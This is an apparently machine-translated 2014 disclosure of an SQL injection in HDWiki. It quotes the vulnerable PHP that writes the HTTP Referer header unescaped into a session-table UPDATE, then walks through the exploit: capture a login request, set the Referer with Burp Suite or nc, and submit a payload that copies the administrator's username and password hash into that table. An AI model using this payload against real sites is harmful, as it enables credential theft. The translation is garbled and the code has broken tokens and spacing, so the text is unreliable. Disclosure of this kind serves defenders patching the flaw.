HDWIKI tasteless 0day-vulnerability warning-the black bar safety net

2014-03-06T00:00:00
ID MYHACK58:62201442755
Type myhack58
Reporter 佚名
Modified 2014-03-06T00:00:00

Description

model/user.class.php to:

function add_referer(){

if($_SERVER['HTTP_REFERER']){

$this->db->query("UPDATE". DB_TABLEPRE."session SET referer='".$ _SERVER['HTTP_REFERER']."' WHERE sid='". base::hgetcookie('sid')."'");

}//Problems then this

}

functionget_referer(){

$session=$this->db->fetch_first("SELECTreferer FROM ". DB_TABLEPRE."session WHERE sid='". base::hgetcookie('sid')."'");

if($session['referer']==""){

$session['referer']="index.php";

}else{

if(strpos($session['referer'],'admin_')!== false){

$session['referer']="index. php? admin_main";

}

}

return$session['referer'];

}

回溯 到 control/user.php

function dologin(){

$_ENV['user']->passport_server('login','1');

if(! isset($this->post['submit'])){ //submit for null into

$this->view->assign('checkcode',isset($this->setting['checkcode'])?$ this->setting['checkcode']:0);

$_ENV['user']->add_referer();//log the time of injection forming

$_ENV['user']->passport_server('login','2');

$_ENV['user']->passport_client('login');

if(! isset($this->setting['name_min_length'])){$this->setting['name_min_length'] = 3;}

if(! isset($this->setting['name_max_length'])){$this->setting['name_max_length'] = 1 5;}

$loginTip2= str_replace(array('3','1 5'),array($this->setting['name_min_length'],$this->setting['name_max_length']),$this->view->lang['loginTip2']);

$this->view->assign('name_min_length',$this->setting['name_min_length']);

$this->view->assign('name_max_length',$this->setting['name_max_length']);

$this->view->assign('loginTip2',$loginTip2);

//$this->view->display('login');

$_ENV['block']->view('login');

}else{

...... The following code omitted

Detailed description:

1, catch the login packet

2, a casually built a user login

3, modify, package, and post the content to retain only the username and password just fine, the other deleted.

Such as username=test&password=test

4, The use burpsuite or nc, to modify the header referer, as follows:

admin_',username=(SELECT concat(username,0x2f,password) FROM wiki_user where uid=1)#

Submitted after opening the administrator account, the password assigned to the wiki_session table of the username field.

So the call wiki_session. username variable of the page will broke the account password for the administrator and ordinary users with the wiki_user table.

Note: but does not find the username or hdwiki_session table field back to significant places, the chicken here.